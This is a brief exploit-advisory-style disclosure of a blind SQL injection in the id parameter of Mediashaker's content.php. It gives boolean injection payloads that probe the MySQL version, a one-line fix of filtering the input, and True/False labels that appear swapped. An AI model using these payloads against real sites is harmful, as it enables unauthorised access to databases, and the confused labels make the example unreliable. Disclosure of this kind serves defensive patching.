标题: Mediashaker Blind SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team WwW.H4ckCity.Org
影响所有版本
开发者:
测试平台: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
示例测试
 
/content.php?id=1 [Blind SQL]
#
#
#  Test Blind SQL Injection in MYSQL Version 5:
#
#
#  False
#
#  ?id=1 and substring(@@version,1,1)=5--
#
#  True
#
#  ?id=1 and substring(@@version,1,1)=4--
#
# 修复
 
过滤content.php页面id参数输入